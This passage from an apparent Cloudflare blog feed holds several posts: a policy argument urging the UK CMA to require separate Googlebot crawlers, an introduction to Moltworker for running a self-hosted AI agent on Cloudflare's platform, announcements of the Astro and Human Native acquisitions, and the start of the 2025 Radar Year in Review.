vs. ~166.98x the amount of unique URLs seen by PerplexityBot;
vs. ~714.48x the amount of unique URLs seen by CCBot; and
vs: ~1801.97x the amount of unique URLs seen by archive.org_bot.

Googlebot also stands out in other Cloudflare datasets.

Even though it ranks as the most active bot by overall traffic, publishers are far less likely to disallow or block Googlebot in their robots.txt file compared to other crawlers. This is likely due to its importance in driving human traffic to their content—and, as a result, ad revenue—through search.

As shown below, almost no website explicitly disallows the dual-purpose Googlebot in full, reflecting how important this bot is to driving traffic via search referrals. (Note that partial disallows often impact certain parts of a website that are irrelevant for search engine optimization, or SEO, such as login endpoints.)

Robots.txt merely allows the expression of crawling preferences; it is not an enforcement mechanism. Publishers rely on “good bots” to comply. To manage crawler access to their sites more effectively—and independently of a given bot’s compliance—publishers can set up a Web Application Firewall (WAF) with specific rules, technically preventing undesired crawlers from accessing their sites. Following the same logic as with robots.txt above, we would expect websites to block mostly other AI crawlers but not Googlebot.

Indeed, when comparing the numbers for customers using AI Crawl Control, Cloudflare’s own AI crawler blocking tool that is integrated in our Application Security suite, between July 2025 and January 2026, one can see that the number of websites actively blocking other popular AI crawlers (e.g., GPTBot, Claudebot), was nearly seven times as high as the number of websites that blocked Googlebot and Bingbot. (Like Googlebot, Bingbot combines search and AI crawling and drives traffic to these sites, but given its small market share in search, its impact is less significant.)

So we agree with the CMA on the problem statement. But how can publishers be enabled to effectively opt out of Google using their content for its generative AI applications? We share the CMA’s conclusion that “in order to be able to make meaningful decisions about how Google uses their Search Content, (...) publishers need the ability effectively to opt their Search Content out of both Google’s search generative AI features and Google’s broader generative AI services.”

But we’re concerned that the CMA’s proposal is insufficient.

CMA’s proposed publisher conduct requirements

On January 28, 2026, the CMA published four sets of proposed conduct requirements for Google, including conduct requirements related to publishers. According to the CMA, the proposed publisher rules are designed to address concerns that publishers (1) lack sufficient choice over how Google uses their content in its AI-generated responses, (2) have limited transparency into Google’s use of that content, and (3) do not get effective attribution for Google’s use of their content. The CMA recognized the importance of these concerns because of the role that Google search plays in finding content online.

The conduct requirements would mandate Google grant publishers "meaningful and effective" control over whether their content is used for AI features, like AI Overviews. Google would be prohibited from taking any action that negatively impacts the effectiveness of those control options, such as intentionally downranking the content in search.

To support informed decisionmaking, the CMA proposal also requires Google to increase transparency, by publishing clear documentation on how it uses crawled content for generative AI and on exactly what its various publisher controls cover in practice. Finally, the proposal would require Google to ensure effective attribution of publisher content and to provide publishers with detailed, disaggregated engagement data—including specific metrics for impressions, clicks, and "click quality"—to help them evaluate the commercial value of allowing their content to be used in AI-generated search summaries.

The CMA’s proposed remedies are insufficient

Although we support the CMA’s efforts to improve options for publishers, we are concerned that the proposed requirements do not solve the underlying issue of promoting fair, transparent choice over how their content is used by Google. Publishers are effectively forced to use Google’s proprietary opt-out mechanisms, tied specifically to the Google platform and under the conditions set by Google, rather than granting them direct, autonomous control. A framework where the platform dictates the rules, manages the technical controls, and defines the scope of application does not offer “effective control” to content creators or encourage competitive innovation in the market. Instead, it reinforces a state of permanent dependency.

Such a framework also reduces choice for publishers. Creating new opt-out controls makes it impossible for publishers to choose to use external tools to block Googlebot from accessing their content without jeopardizing their appearance in Search results. Instead, under the current proposal, content creators will still have to allow Googlebot to scrape their websites, with no enforcement mechanisms to deploy and limited visibility available if Google does not respect their signalled preferences. Enforcement of these requirements by the CMA, if done properly, will be very onerous, without guarantee that publishers will trust the solution.

In fact, Cloudflare has received feedback from its customers that Google’s current proprietary opt-out mechanisms, including Google-Extended and ‘nosnippet’, have failed to prevent content from being utilized in ways that publishers cannot control. These opt-out tools also do not enable mechanisms for fair compensation for publishers.

More broadly, as reflected in our proposed responsible AI bot principles, we believe that all AI bots should have one distinct purpose and declare it, so that website owners can make clear decisions over who can access their content and why. Unlike its leading competitors, such as OpenAI and Anthropic, Google does not comply with this principle for Googlebot, which is used for multiple purposes (search indexing, AI training, and inference/grounding). Simply requiring Google to develop a new opt-out mechanism would not allow publishers to achieve meaningful control over the use of their content.

The most effective way to give publishers that necessary control is to require Googlebot to be split up into separate crawlers. That way, publishers could allow crawling for traditional search indexing, which they need to attract traffic to their sites, but block access for unwanted use of their content in generative AI services and features.

Requiring crawler separation is the only effective solution

To ensure a fair digital ecosystem, the CMA must instead empower content owners to prevent Google from accessing their data for particular purposes in the first place, rather than relying on Google-managed workarounds after the crawler has already accessed the content for other purposes. That approach also enables creators to set conditions for access to their content.

Although the CMA described crawler separation as an “equally effective intervention”, it ultimately rejected mandating separation based on Google’s input that it would be too onerous. We disagree.

Requiring Google to split up Googlebot by purpose — just like Google already does for its nearly 20 other crawlers — is not only technically feasible, but also a necessary and proportionate remedy that empowers website operators to have the granular control they currently lack, without increasing traffic load from crawlers to their websites (and in fact, perhaps even decreasing it, should they choose to block AI crawling).

To be clear, a crawler separation remedy benefits AI companies, by leveling the playing field between them and Google, in addition to giving UK-based publishers more control over their content. (There has been widespread public support for a crawler separation remedy by Daily Mail Group, the Guardian and the News Media Association.) Mandatory crawler separation is not a disadvantage to Google, nor does it undermine investment in AI. On the contrary, it is a pro-competitive safeguard that prevents Google from leveraging its search monopoly to gain an unfair advantage in the AI market. By decoupling these functions, we ensure that AI development is driven by fair-market competition rather than the exploitation of a single hyperscaler’s dominance.

******

The UK has a unique chance to lead the world in protecting the value of original and high-quality content on the Internet. However, we worry that the current proposals fall short. We would encourage rules that ensure that Google operates under the same conditions for content access as other AI developers, meaningfully restoring agency to publishers and paving the way for new business models promoting content monetization.

Cloudflare remains committed to engaging with the CMA and other partners during upcoming consultations to provide evidence-based data to help shape a final decision on conduct requirements that are targeted, proportional, and effective. The CMA still has an opportunity to ensure that the Internet becomes a fair marketplace for content creators and smaller AI players—not just a select few tech giants.

Introducing Moltworker: a self-hosted personal AI agent, minus the minis

Celso Martinho — Thu, 29 Jan 2026 14:00:00 GMT

Editorial note: As of January 30, 2026, Moltbot has been renamed to OpenClaw.

The Internet woke up this week to a flood of people buying Mac minis to run Moltbot (formerly Clawdbot), an open-source, self-hosted AI agent designed to act as a personal assistant. Moltbot runs in the background on a user's own hardware, has a sizable and growing list of integrations for chat applications, AI models, and other popular tools, and can be controlled remotely. Moltbot can help you with your finances, social media, organize your day — all through your favorite messaging app.

But what if you don’t want to buy new dedicated hardware? And what if you could still run your Moltbot efficiently and securely online? Meet Moltworker, a middleware Worker and adapted scripts that allows running Moltbot on Cloudflare's Sandbox SDK and our Developer Platform APIs.

A personal assistant on Cloudflare — how does that work?

Cloudflare Workers has never been as compatible with Node.js as it is now. Where in the past we had to mock APIs to get some packages running, now those APIs are supported natively by the Workers Runtime.

This has changed how we can build tools on Cloudflare Workers. When we first implemented Playwright, a popular framework for web testing and automation that runs on Browser Rendering, we had to rely on memfs. This was bad because not only is memfs a hack and an external dependency, but it also forced us to drift away from the official Playwright codebase. Thankfully, with more Node.js compatibility, we were able to start using node:fs natively, reducing complexity and maintainability, which makes upgrades to the latest versions of Playwright easy to do.

The list of Node.js APIs we support natively keeps growing. The blog post “A year of improving Node.js compatibility in Cloudflare Workers” provides an overview of where we are and what we’re doing.

We measure this progress, too. We recently ran an experiment where we took the 1,000 most popular NPM packages, installed and let AI loose, to try to run them in Cloudflare Workers, Ralph Wiggum as a "software engineer" style, and the results were surprisingly good. Excluding the packages that are build tools, CLI tools or browser-only and don’t apply, only 15 packages genuinely didn’t work. That's 1.5%.

Here’s a graphic of our Node.js API support over time:

We put together a page with the results of our internal experiment on npm packages support here, so you can check for yourself.

Moltbot doesn’t necessarily require a lot of Workers Node.js compatibility because most of the code runs in a container anyway, but we thought it would be important to highlight how far we got supporting so many packages using native APIs. This is because when starting a new AI agent application from scratch, we can actually run a lot of the logic in Workers, closer to the user.

The other important part of the story is that the list of products and APIs on our Developer Platform has grown to the point where anyone can build and run any kind of application — even the most complex and demanding ones — on Cloudflare. And once launched, every application running on our Developer Platform immediately benefits from our secure and scalable global network.

Those products and services gave us the ingredients we needed to get started. First, we now have Sandboxes, where you can run untrusted code securely in isolated environments, providing a place to run the service. Next, we now have Browser Rendering, where you can programmatically control and interact with headless browser instances. And finally, R2, where you can store objects persistently. With those building blocks available, we could begin work on adapting Moltbot.

How we adapted Moltbot to run on us

Moltbot on Workers, or Moltworker, is a combination of an entrypoint Worker that acts as an API router and a proxy between our APIs and the isolated environment, both protected by Cloudflare Access. It also provides an administration UI and connects to the Sandbox container where the standard Moltbot Gateway runtime and its integrations are running, using R2 for persistent storage.

^{High-level architecture diagram of Moltworker.}

Let's dive in more.

AI Gateway

Cloudflare AI Gateway acts as a proxy between your AI applications and any popular AI provider, and gives our customers centralized visibility and control over the requests going through.

Recently we announced support for Bring Your Own Key (BYOK), where instead of passing your provider secrets in plain text with every request, we centrally manage the secrets for you and can use them with your gateway configuration.

An even better option where you don’t have to manage AI providers' secrets at all end-to-end is to use Unified Billing. In this case you top up your account with credits and use AI Gateway with any of the supported providers directly, Cloudflare gets charged, and we will deduct credits from your account.

To make Moltbot use AI Gateway, first we create a new gateway instance, then we enable the Anthropic provider for it, then we either add our Claude key or purchase credits to use Unified Billing, and then all we need to do is set the ANTHROPIC_BASE_URL environment variable so Moltbot uses the AI Gateway endpoint. That’s it, no code changes necessary.

Once Moltbot starts using AI Gateway, you’ll have full visibility on costs and have access to logs and analytics that will help you understand how your AI agent is using the AI providers.

Note that Anthropic is one option; Moltbot supports other AI providers and so does AI Gateway. The advantage of using AI Gateway is that if a better model comes along from any provider, you don’t have to swap keys in your AI Agent configuration and redeploy — you can simply switch the model in your gateway configuration. And more, you specify model or provider fallbacks to handle request failures and ensure reliability.

Sandboxes

Last year we anticipated the growing need for AI agents to run untrusted code securely in isolated environments, and we announced the Sandbox SDK. This SDK is built on top of Cloudflare Containers, but it provides a simple API for executing commands, managing files, running background processes, and exposing services — all from your Workers applications.

In short, instead of having to deal with the lower-level Container APIs, the Sandbox SDK gives you developer-friendly APIs for secure code execution and handles the complexity of container lifecycle, networking, file systems, and process management — letting you focus on building your application logic with just a few lines of TypeScript. Here’s an example:

import { getSandbox } from '@cloudflare/sandbox';
export { Sandbox } from '@cloudflare/sandbox';

export default {
  async fetch(request: Request, env: Env): Promise {
    const sandbox = getSandbox(env.Sandbox, 'user-123');

    // Create a project structure
    await sandbox.mkdir('/workspace/project/src', { recursive: true });

    // Check node version
    const version = await sandbox.exec('node -v');

    // Run some python code
    const ctx = await sandbox.createCodeContext({ language: 'python' });
    await sandbox.runCode('import math; radius = 5', { context: ctx });
    const result = await sandbox.runCode('math.pi * radius ** 2', { context: ctx });

    return Response.json({ version, result });
  }
};

This fits like a glove for Moltbot. Instead of running Docker in your local Mac mini, we run Docker on Containers, use the Sandbox SDK to issue commands into the isolated environment and use callbacks to our entrypoint Worker, effectively establishing a two-way communication channel between the two systems.

R2 for persistent storage

The good thing about running things in your local computer or VPS is you get persistent storage for free. Containers, however, are inherently ephemeral, meaning data generated within them is lost upon deletion. Fear not, though — the Sandbox SDK provides the sandbox.mountBucket() that you can use to automatically, well, mount your R2 bucket as a filesystem partition when the container starts.

Once we have a local directory that is guaranteed to survive the container lifecycle, we can use that for Moltbot to store session memory files, conversations and other assets that are required to persist.

Browser Rendering for browser automation

AI agents rely heavily on browsing the sometimes not-so-structured web. Moltbot utilizes dedicated Chromium instances to perform actions, navigate the web, fill out forms, take snapshots, and handle tasks that require a web browser. Sure, we can run Chromium on Sandboxes too, but what if we could simplify and use an API instead?

With Cloudflare’s Browser Rendering, you can programmatically control and interact with headless browser instances running at scale in our edge network. We support Puppeteer, Stagehand, Playwright and other popular packages so that developers can onboard with minimal code changes. We even support MCP for AI.

In order to get Browser Rendering to work with Moltbot we do two things:

First we create a thin CDP proxy (CDP is the protocol that allows instrumenting Chromium-based browsers) from the Sandbox container to the Moltbot Worker, back to Browser Rendering using the Puppeteer APIs.
Then we inject a Browser Rendering skill into the runtime when the Sandbox starts.

From the Moltbot runtime perspective, it has a local CDP port it can connect to and perform browser tasks.

Zero Trust Access for authentication policies

Next up we want to protect our APIs and Admin UI from unauthorized access. Doing authentication from scratch is hard, and is typically the kind of wheel you don’t want to reinvent or have to deal with. Zero Trust Access makes it incredibly easy to protect your application by defining specific policies and login methods for the endpoints.

^{Zero Trust Access Login methods configuration for the Moltworker application.}

Once the endpoints are protected, Cloudflare will handle authentication for you and automatically include a JWT token with every request to your origin endpoints. You can then validate that JWT for extra protection, to ensure that the request came from Access and not a malicious third party.

Like with AI Gateway, once all your APIs are behind Access you get great observability on who the users are and what they are doing with your Moltbot instance.

Moltworker in action

Demo time. We’ve put up a Slack instance where we could play with our own instance of Moltbot on Workers. Here are some of the fun things we’ve done with it.

We hate bad news.

Here’s a chat session where we ask Moltbot to find the shortest route between Cloudflare in London and Cloudflare in Lisbon using Google Maps and take a screenshot in a Slack channel. It goes through a sequence of steps using Browser Rendering to navigate Google Maps and does a pretty good job at it. Also look at Moltbot’s memory in action when we ask him the second time.

We’re in the mood for some Asian food today, let’s get Moltbot to work for help.

We eat with our eyes too.

Let’s get more creative and ask Moltbot to create a video where it browses our developer documentation. As you can see, it downloads and runs ffmpeg to generate the video out of the frames it captured in the browser.

Run your own Moltworker

We open-sourced our implementation and made it available at https://github.com/cloudflare/moltworker, so you can deploy and run your own Moltbot on top of Workers today.

The README guides you through the necessary setup steps. You will need a Cloudflare account and a Workers Paid plan to access Sandbox Containers; however, all other products are either entirely free (like AI Gateway) or include generous free tiers that allow you to get started and scale under reasonable limits.

Note that Moltworker is a proof of concept, not a Cloudflare product. Our goal is to showcase some of the most exciting features of our Developer Platform that can be used to run AI agents and unsupervised code efficiently and securely, and get great observability while taking advantage of our global network.

Feel free to contribute to or fork our GitHub repository; we will keep an eye on it for a while for support. We are also considering contributing upstream to the official project with Cloudflare skills in parallel.

Conclusion

We hope you enjoyed this experiment, and we were able to convince you that Cloudflare is the perfect place to run your AI applications and agents. We’ve been working relentlessly trying to anticipate the future and release features like the Agents SDK that you can use to build your first agent in minutes, Sandboxes where you can run arbitrary code in an isolated environment without the complications of the lifecycle of a container, and AI Search, Cloudflare’s managed vector-based search service, to name a few.

Cloudflare now offers a complete toolkit for AI development: inference, storage APIs, databases, durable execution for stateful workflows, and built-in AI capabilities. Together, these building blocks make it possible to build and run even the most demanding AI applications on our global edge network.

If you're excited about AI and want to help us build the next generation of products and APIs, we're hiring.

Astro is joining Cloudflare

Fred Schott — Fri, 16 Jan 2026 14:00:00 GMT

The Astro Technology Company, creators of the Astro web framework, is joining Cloudflare.

Astro is the web framework for building fast, content-driven websites. Over the past few years, we’ve seen an incredibly diverse range of developers and companies use Astro to build for the web. This ranges from established brands like Porsche and IKEA, to fast-growing AI companies like Opencode and OpenAI. Platforms that are built on Cloudflare, like Webflow Cloud and Wix Vibe, have chosen Astro to power the websites their customers build and deploy to their own platforms. At Cloudflare, we use Astro, too — for our developer docs, website, landing pages, blog, and more. Astro is used almost everywhere there is content on the Internet.

By joining forces with the Astro team, we are doubling down on making Astro the best framework for content-driven websites for many years to come. The best version of Astro — Astro 6 — is just around the corner, bringing a redesigned development server powered by Vite. The first public beta release of Astro 6 is now available, with GA coming in the weeks ahead.

We are excited to share this news and even more thrilled for what it means for developers building with Astro. If you haven’t yet tried Astro — give it a spin and run npm create astro@latest.

What this means for Astro

Astro will remain open source, MIT-licensed, and open to contributions, with a public roadmap and open governance. All full-time employees of The Astro Technology Company are now employees of Cloudflare, and will continue to work on Astro. We’re committed to Astro’s long-term success and eager to keep building.

Astro wouldn’t be what it is today without an incredibly strong community of open-source contributors. Cloudflare is also committed to continuing to support open-source contributions, via the Astro Ecosystem Fund, alongside industry partners including Webflow, Netlify, Wix, Sentry, Stainless and many more.

From day one, Astro has been a bet on the web and portability: Astro is built to run anywhere, across clouds and platforms. Nothing changes about that. You can deploy Astro to any platform or cloud, and we’re committed to supporting Astro developers everywhere.

There are many web frameworks out there — so why are developers choosing Astro?

Astro has been growing rapidly:

Why? Many web frameworks have come and gone trying to be everything to everyone, aiming to serve the needs of both content-driven websites and web applications.

The key to Astro’s success: Instead of trying to serve every use case, Astro has stayed focused on five design principles. Astro is…

Content-driven: Astro was designed to showcase your content.
Server-first: Websites run faster when they render HTML on the server.
Fast by default: It should be impossible to build a slow website in Astro.
Easy to use: You don’t need to be an expert to build something with Astro.
Developer-focused: You should have the resources you need to be successful.

Astro’s Islands Architecture is a core part of what makes all of this possible. The majority of each page can be fast, static HTML — fast and simple to build by default, oriented around rendering content. And when you need it, you can render a specific part of a page as a client island, using any client UI framework. You can even mix and match multiple frameworks on the same page, whether that’s React.js, Vue, Svelte, Solid, or anything else:

Bringing back the joy in building websites

The more Astro and Cloudflare started talking, the clearer it became how much we have in common. Cloudflare’s mission is to help build a better Internet — and part of that is to help build a faster Internet. Almost all of us grew up building websites, and we want a world where people have fun building things on the Internet, where anyone can publish to a site that is truly their own.

When Astro first launched in 2021, it had become painful to build great websites — it felt like a fight with build tools and frameworks. It sounds strange to say it, with the coding agents and powerful LLMs of 2026, but in 2021 it was very hard to build an excellent and fast website without being a domain expert in JavaScript build tooling. So much has gotten better, both because of Astro and in the broader frontend ecosystem, that we take this almost for granted today.

The Astro project has spent the past five years working to simplify web development. So as LLMs, then vibe coding, and now true coding agents have come along and made it possible for truly anyone to build — Astro provided a foundation that was simple and fast by default. We’ve all seen how much better and faster agents get when building off the right foundation, in a well-structured codebase. More and more, we’ve seen both builders and platforms choose Astro as that foundation.

We’ve seen this most clearly through the platforms that both Cloudflare and Astro serve, that extend Cloudflare to their own customers in creative ways using Cloudflare for Platforms, and have chosen Astro as the framework that their customers build on.

When you deploy to Webflow Cloud, your Astro site just works and is deployed across Cloudflare’s network. When you start a new project with Wix Vibe, behind the scenes you’re creating an Astro site, running on Cloudflare. And when you generate a developer docs site using Stainless, that generates an Astro project, running on Cloudflare, powered by Starlight — a framework built on Astro.

Each of these platforms is built for a different audience. But what they have in common — beyond their use of Cloudflare and Astro — is they make it fun to create and publish content to the Internet. In a world where everyone can be both a builder and content creator, we think there are still so many more platforms to build and people to reach.

Astro 6 — new local dev server, powered by Vite

Astro 6 is coming, and the first open beta release is now available. To be one of the first to try it out, run:

npm create astro@latest -- --ref next

Or to upgrade your existing Astro app, run:

npx @astrojs/upgrade beta

Astro 6 brings a brand new development server, built on the Vite Environments API, that runs your code locally using the same runtime that you deploy to. This means that when you run astro dev with the Cloudflare Vite plugin, your code runs in workerd, the open-source Cloudflare Workers runtime, and can use Durable Objects, D1, KV, Agents and more. This isn’t just a Cloudflare feature: Any JavaScript runtime with a plugin that uses the Vite Environments API can benefit from this new support, and ensure local dev runs in the same environment, with the same runtime APIs as production.

Live Content Collections in Astro are also stable in Astro 6 and out of beta. These content collections let you update data in real time, without requiring a rebuild of your site. This makes it easy to bring in content that changes often, such as the current inventory in a storefront, while still benefitting from the built-in validation and caching that come with Astro’s existing support for content collections.

There’s more to Astro 6, including Astro’s most upvoted feature request — first-class support for Content Security Policy (CSP) — as well as simpler APIs, an upgrade to Zod 4, and more.

Doubling down on Astro

We're thrilled to welcome the Astro team to Cloudflare. We’re excited to keep building, keep shipping, and keep making Astro the best way to build content-driven sites. We’re already thinking about what comes next beyond V6, and we’d love to hear from you.

To keep up with the latest, follow the Astro blog and join the Astro Discord. Tell us what you’re building!

Human Native is joining Cloudflare

Will Allen — Thu, 15 Jan 2026 14:00:00 GMT

Today, we’re excited to share that Cloudflare has acquired Human Native, a UK-based AI data marketplace specializing in transforming multimedia content into searchable and useful data.

Human Native x Cloudflare

The Human Native team has spent the past few years focused on helping AI developers create better AI through licensed data. Their technology helps publishers and developers turn messy, unstructured content into something that can be understood, licensed and ultimately valued. They have approached data not as something to be scraped, but as an asset class that deserves structure, transparency and respect.

Access to high-quality data can lead to better technical performance. One of Human Native’s customers, a prominent UK video AI company, threw away their existing training data after achieving superior results with data sourced through Human Native. Going forward they are only training on fully licensed, reputably sourced, high-quality content.

This gives a preview of what the economic model of the Internet can be in the age of generative AI: better AI built on better data, with fair control, compensation and credit for creators.

The Internet needs new economic models

For the last 30 years, the open Internet has been based on a fundamental value exchange: creators create content, aggregators (such as search engines or social media) send traffic. Creators can monetize that traffic through advertisements, subscriptions or direct support. This is the economic loop that has powered the explosive growth of the Internet.

But it’s under real strain.

Crawl-to-referral ratios are skyrocketing, with 10s of thousands of AI and bot crawls per real human visitor, and it’s unclear how multipurpose crawlers are using the content they access.

The community of creators who publish on the Internet is a diverse group: news publishers, content creators, financial professionals, technology companies, aggregators and more. But they have one thing in common: They want to decide how their content is used by AI systems.

Cloudflare’s work in building AI Crawl Control and Pay Per Crawl is predicated on a simple philosophy: Content owners should get to decide how and when their content is accessed by others. Many of our customers want to optimize their brand and content to make sure it is in every training data set and shows up in every new search; others want to have more control and only allow access if there is direct compensation.

Our tools like AI Search, AI Crawl Control and Pay Per Crawl can help, wherever you land in that equation. The important thing is that the content owner gets to decide.

New tools for AI developers

With the Human Native team joining Cloudflare, we are accelerating our work in helping customers transform their content to be easily accessed and understood by AI bots and agents in addition to their traditional human audiences.

Crawling is complex, expensive in terms of engineering and compute to process the content, and has no guarantees of quality control. A crawled index can contain duplicates, spam, illegal material and many more headaches. Developers are left with messy, unstructured data.

We recently announced our work in building the AI Index, a powerful new way for both foundation model companies and agents to access content at scale.

Instead of sending crawlers blindly and repeatedly across the open Internet, AI developers will be able to connect via a pub/sub model: participating websites will expose structured updates whenever their content changes, and developers will be able to subscribe to receive those updates in real time.

This opens up new avenues for content creators to experiment with new business models.

Building the foundation for these new business models

Cloudflare is investing heavily in creating the foundations for these new business models, starting with x402.

We recently announced that we are creating the x402 Foundation, in partnership with Coinbase, to enable machine-to-machine transactions for digital resources.

Payments on the web have historically been designed for humans. We browse a merchant’s website, show intent by adding items to a cart, and confirm our intent to purchase by putting in our credit card information and clicking “Pay.” But what if you want to enable direct transactions between automated systems? We need protocols to allow machine-to-machine transactions.

Together, Human Native and Cloudflare will accelerate our work in building the basis of these new economic models for the Internet.

What’s next

The Internet works best when it is open, fair, and independently sustainable. We’re excited to welcome the Human Native team to Cloudflare, and even more excited about what we will build together to improve the foundations of the Internet in the age of AI.

Onwards.

The 2025 Cloudflare Radar Year in Review: The rise of AI, post-quantum, and record-breaking DDoS attacks

David Belson — Mon, 15 Dec 2025 14:00:00 GMT

The 2025 Cloudflare Radar Year in Review is here: our sixth annual review of the Internet trends and patterns we observed throughout the year, based on Cloudflare’s expansive network view.

Our view is unique, due to Cloudflare’s global network, which has a presence in 330 cities in over 125 countries/regions, handling over 81 million HTTP requests per second on average, with more than 129 million HTTP requests per second at peak on behalf of millions of customer Web properties, in addition to responding to approximately 67 million (authoritative + resolver) DNS queries per second. Cloudflare Radar uses the data generated by these Web and DNS services, combined with other complementary data sets, to provide near-real time insights into traffic, bots, security, connectivity, and DNS patterns and trends that we observe across the Internet.

Our Radar Year in Review takes that observability and, instead of a real-time view, offers a look back at 2025: incorporating interactive charts, graphs, and maps that allow you to explore and compare selected trends and measurements year-over-year and across geographies, as well as share and embed Year in Review graphs.

The 2025 Year In Review is organized into six sections: Traffic, AI, Adoption & Usage, Connectivity, Security, and Email Security, with data spanning the period from January 1 to December 2, 2025. To ensure consistency, we kept underlying methodologies unchanged from previous years’ calculations. We also incorporated several new data sets this year, including multiple AI-related metrics, global speed test activity, and hyper-volumetric DDOS size progression. Trends for over 200 countries/regions are available on the microsite; smaller or less-populated locations are excluded due to insufficient data. Some metrics are only shown worldwide and are not displayed if a country/region is selected.

In this post, we highlight key findings and interesting observations from the major Year In Review microsite sections, and we have again published a companion Most Popular Internet Services blog post that specifically explores trends seen across top Internet Services.

We encourage you to visit the 2025 Year in Review microsite to explore the datasets and metrics in more detail, including those for your country/region to see how they have changed since 2024, and how they compare to other areas of interest.

We hope you’ll find the Year in Review to be an insightful and powerful tool — to explore the disruptions, advances, and metrics that defined the Internet in 2025.

Let’s dig in.

Key Findings

Traffic

Global Internet traffic grew 19% in 2025, with significant growth starting in August. ➜
The top 10 most popular Internet services saw a few year-over-year shifts, while a number of new entrants landed on category lists. ➜
Starlink traffic doubled in 2025, including traffic from over 20 new countries/regions. ➜
Googlebot was again responsible for the highest volume of request traffic to Cloudflare in 2025 as it crawled millions of Cloudflare customer sites for search indexing and AI training. ➜
The share of human-generated Web traffic that is post-quantum encrypted has grown to 52%. ➜
Googlebot was responsible for more than a quarter of Verified Bot traffic. ➜

AI

Crawl volume from dual-purpose Googlebot dwarfed other AI bots and crawlers. ➜
AI “user action” crawling increased by over 15x in 2025. ➜
While other AI bots accounted for 4.2% of HTML request traffic, Googlebot alone accounted for 4.5%. ➜
Anthropic had the highest crawl-to-refer ratio among the leading AI and search platforms. ➜
AI crawlers were the most frequently fully disallowed user agents found in robots.txt files. ➜
On Workers AI, Meta’s llama-3-8b-instruct model was the most popular model, and text generation was the most popular task type. ➜

Adoption & Usage

iOS devices generated 35% of mobile device traffic globally — and more than half of device traffic in many countries. ➜
The shares of global Web requests using HTTP/3 and HTTP/2 both increased slightly in 2025. ➜
JavaScript-based libraries and frameworks remained integral tools for building Web sites. ➜
One-fifth of automated API requests were made by Go-based clients. ➜
Google remains the top search engine, with Yandex, Bing, and DuckDuckGo distant followers. ➜
Chrome remains the top browser across platforms and operating systems – except on iOS, where Safari has the largest share. ➜

Connectivity

Almost half of the 174 major Internet outages observed around the world in 2025 were due to government-directed regional and national shutdowns of Internet connectivity. ➜
Globally, less than a third of dual-stack requests were made over IPv6, while in India, over two-thirds were. ➜
European countries had some of the highest download speeds, all above 200 Mbps. Spain remained consistently among the top locations across measured Internet quality metrics. ➜
London and Los Angeles were hotspots for Cloudflare speed test activity in 2025. ➜
More than half of request traffic comes from mobile devices in 117 countries/regions. ➜

Security

6% of global traffic over Cloudflare’s network was mitigated by our systems — either as potentially malicious or for customer-defined reasons. ➜
40% of global bot traffic came from the United States, with Amazon Web Services and Google Cloud originating a quarter of global bot traffic. ➜
Organizations in the "People and Society” sector were the most targeted during 2025. ➜
Routing security, measured as the shares of RPKI valid routes and covered IP address space, saw continued improvement throughout 2025. ➜
Hyper-volumetric DDoS attack sizes grew significantly throughout the year. ➜
More than 5% of email messages analyzed by Cloudflare were found to be malicious. ➜
Deceptive links, identity deception, and brand impersonation were the most common types of threats found in malicious email messages. ➜
Nearly all of the email messages from the .christmas and .lol Top Level Domains were found to be either spam or malicious. ➜

Traffic trends

Global Internet traffic grew 19% in 2025, with significant growth starting in August

To determine the traffic trends over time for the Year in Review, we use the average daily traffic volume (excluding bot traffic) over the second full calendar week (January 12-18) of 2025 as our baseline. (The second calendar week is used to allow time for people to get back into their “normal” school and work routines after the winter holidays and New Year’s Day.) The percent change shown in the traffic trends chart is calculated relative to the baseline value — it does not represent absolute traffic volume for a country/region. The trend line represents a seven-day trailing average, which is used to smooth the sharp changes seen with data at a daily granularity.

Traffic growth in 2025 appeared to occur in several phases. Traffic was, on average, somewhat flat through mid-April, generally within a couple of percent of the baseline value. However, it then saw growth through May to approximately 5% above baseline, staying in the +4-7% range through mid-August. It was at that time that growth accelerated, climbing steadily through September, October, and November, peaking at 19% growth for the year. Aided by a late-November increase, 2025’s rate of growth is about 10% higher than the 17% growth observed in 2024. In past years, we have also observed traffic growth accelerating in the back half of the year, although in 2022-2024, that acceleration started in July. It’s not clear why this year’s growth was seemingly delayed by several weeks.

^{Internet traffic trends in 2025, worldwide}

Botswana saw the highest peak growth, reaching 298% above baseline on November 8, and ending the period 295% over baseline. (More on what accounts for that growth in the Starlink section below.) Botswana and Sudan were the only countries/regions to see traffic more than double over the course of the year, although some others experienced peak increases over 100% at some point during the year.

^{Internet traffic trends in 2025, Botswana}

The impact of extended Internet disruptions are clearly visible within the graphs as well. For example, on October 29, the Tanzanian government imposed an Internet shutdown there in response to election day protests. That shutdown lasted just a day, but another one followed from October 30 until November 3. Although traffic in the country had increased more than 40% above baseline ahead of the shutdowns, the disruption ultimately dropped traffic more than 70% below baseline — a rapid reversal. Traffic recovered quickly after connectivity was restored. A similar pattern was observed in Jamaica, where Internet traffic spiked ahead of the arrival of Hurricane Melissa on October 28, and then dropped significantly after the storm caused power outages and infrastructure damage on the island. Traffic began to rebound after the storm’s passing, returning to a level just above baseline by early December.

^{Internet traffic trends in 2025, Tanzania}

^{Internet traffic trends in 2025, Jamaica}

The top 10 most popular Internet services saw some year-over-year shifts, while the category lists saw a number of new entrants

For the Year in Review, we look at the 11-month year-to-date period. In addition to an “overall” ranked list, we also rank services across nine categories, based on analysis of anonymized query data of traffic to our 1.1.1.1 public DNS resolver from millions of users around the world. For the purposes of these rankings, domains that belong to a single Internet service are grouped together.

Google and Facebook once again held the top two spots among the top 10. Although the other members of the top 10 list remained consistent with 2024’s rankings, there was some movement in the middle. Microsoft, Instagram, and YouTube all moved higher; Amazon Web Services (AWS) dropped one spot lower, while TikTok fell four spots.

^{Top Internet services in 2025, worldwide}

Among Generative AI services, ChatGPT/OpenAI remained at the top of the list. But there was movement elsewhere, highlighting the dynamic nature of the industry. Services that moved up the rankings include Perplexity, Claude/Anthropic, and GitHub Copilot. New entries in the top 10 for 2025 include Google Gemini, Windsurf AI, Grok/xAI, and DeepSeek.

^{Top Generative AI services in 2025, worldwide}

Other categories saw movement within their lists as well – Shopee (“the leading e-commerce online shopping platform in Southeast Asia and Taiwan”) is a new entrant to the E-Commerce list, and HBO Max joined the Video Streaming ranking. These categorical rankings, as well as trends seen by specific services, are explored in more detail in a separate blog post.

In addition, this year we are also providing top Internet services insights at a country/region level for the Overall, Generative AI, Social Media, and Messaging categories. (In 2024, we only shared Overall insights.)

Starlink traffic doubled in 2025, including traffic from over 20 new countries/regions

